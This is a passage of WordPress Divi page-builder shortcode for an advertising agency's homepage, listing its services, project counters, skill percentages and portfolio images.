icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"digital agency\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" alt=\"creative agency\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"creative marketing agency.\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"best creative agency\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element 